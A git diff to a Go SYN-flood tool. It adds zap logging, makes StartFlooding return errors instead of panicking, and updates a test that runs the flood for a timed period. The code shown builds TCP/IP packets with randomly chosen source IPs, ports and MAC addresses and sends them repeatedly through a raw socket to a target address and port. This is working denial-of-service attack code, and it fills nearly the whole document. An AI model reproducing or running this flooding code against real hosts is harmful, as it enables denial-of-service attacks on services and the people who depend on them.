diff --git a/cmd/syn-flood/main.go b/cmd/syn-flood/main.go index 2f9e6a6..055f90c 100644 --- a/cmd/syn-flood/main.go +++ b/cmd/syn-flood/main.go @@ -1,20 +1,28 @@ package main import ( + "github.com/bilalcaliskan/syn-flood/internal/logging" "github.com/bilalcaliskan/syn-flood/internal/options" "github.com/bilalcaliskan/syn-flood/internal/raw" "github.com/dimiro1/banner" + "go.uber.org/zap" "io/ioutil" "os" "strings" ) +var logger *zap.Logger + func init() { + logger = logging.GetLogger() + bannerBytes, _ := ioutil.ReadFile("banner.txt") banner.Init(os.Stdout, true, false, strings.NewReader(string(bannerBytes))) } func main() { sfo := options.GetSynFloodOptions() - raw.StartFlooding(sfo.DstIpStr, sfo.DstPort, sfo.PayloadLength) + if err := raw.StartFlooding(sfo.DstIpStr, sfo.DstPort, sfo.PayloadLength); err != nil { + logger.Fatal("an error occured on flooding process", zap.String("error", err.Error())) + } } diff --git a/internal/raw/raw.go b/internal/raw/raw.go index 1c8c200..6afcb24 100644 --- a/internal/raw/raw.go +++ b/internal/raw/raw.go @@ -24,10 +24,15 @@ func init() { } // StartFlooding does the heavy lifting, starts the flood -func StartFlooding(dstIpStr string, dstPort, payloadLength int) { +func StartFlooding(dstIpStr string, dstPort, payloadLength int) error { + var ( + ipHeader *ipv4.Header + packetConn net.PacketConn + rawConn *ipv4.RawConn + ) + defer func() { - err = logger.Sync() - if err != nil { + if err := logger.Sync(); err != nil { panic(err) } }() @@ -51,11 +56,8 @@ func StartFlooding(dstIpStr string, dstPort, payloadLength int) { ipPacket := buildIpPacket(srcIps[rand.Intn(len(srcIps))], dstIpStr) tcpPacket := buildTcpPacket(srcPorts[rand.Intn(len(srcPorts))], dstPort) - ethernetLayer := buildEthernetPacket(macAddrs[rand.Intn(len(macAddrs))], macAddrs[rand.Intn(len(macAddrs))]) - - err := tcpPacket.SetNetworkLayerForChecksum(ipPacket) - if err != nil { - panic(err) + if err = tcpPacket.SetNetworkLayerForChecksum(ipPacket); err != nil { + return err } // Serialize. Note: we only serialize the TCP layer, because the @@ -69,35 +71,31 @@ func StartFlooding(dstIpStr string, dstPort, payloadLength int) { } if err = ipPacket.SerializeTo(ipHeaderBuf, opts); err != nil { - panic(err) + return err } - ipHeader, err := ipv4.ParseHeader(ipHeaderBuf.Bytes()) - if err != nil { - panic(err) + if ipHeader, err = ipv4.ParseHeader(ipHeaderBuf.Bytes()); err != nil { + return err } + ethernetLayer := buildEthernetPacket(macAddrs[rand.Intn(len(macAddrs))], macAddrs[rand.Intn(len(macAddrs))]) tcpPayloadBuf := gopacket.NewSerializeBuffer() payload := gopacket.Payload(payload) - if err = gopacket.SerializeLayers(tcpPayloadBuf, opts, ethernetLayer, tcpPacket, payload); err != nil { - panic(err) + return err } // XXX send packet - var packetConn net.PacketConn - var rawConn *ipv4.RawConn - if packetConn, err = net.ListenPacket("ip4:tcp", "0.0.0.0"); err != nil { - panic(err) + return err } if rawConn, err = ipv4.NewRawConn(packetConn); err != nil { - panic(err) + return err } if err = rawConn.WriteTo(ipHeader, tcpPayloadBuf.Bytes(), nil); err != nil { - panic(err) + return err } logger.Info("packet sent!", zap.String("srcPort", tcpPacket.SrcPort.String()), @@ -107,7 +105,7 @@ func StartFlooding(dstIpStr string, dstPort, payloadLength int) { zap.String("dstIp", ipPacket.DstIP.String())) if err = bar.Add(payloadLength); err != nil { - panic(err) + return err } } } diff --git a/internal/raw/raw_test.go b/internal/raw/raw_test.go index 5c13e5a..d69b33d 100644 --- a/internal/raw/raw_test.go +++ b/internal/raw/raw_test.go @@ -34,7 +34,13 @@ func TestStartFlooding(t *testing.T) { ctx, cancel := context.WithTimeout(context.Background(), time.Duration(tc.floodMilliSeconds)*time.Millisecond) defer cancel() t.Logf("starting flood, caseName=%s, floodMilliSeconds=%d\n", tc.name, tc.floodMilliSeconds) - go StartFlooding(tc.dstIp, tc.dstPort, tc.payloadLength) + go func() { + if err := StartFlooding(tc.dstIp, tc.dstPort, tc.payloadLength); err != nil { + t.Errorf("an error occured on flooding process, caseName=%s, floodMilliSeconds=%d, "+ + "error=%s\n", tc.name, tc.floodMilliSeconds, err.Error()) + return + } + }() select { case <-time.After(120 * time.Second):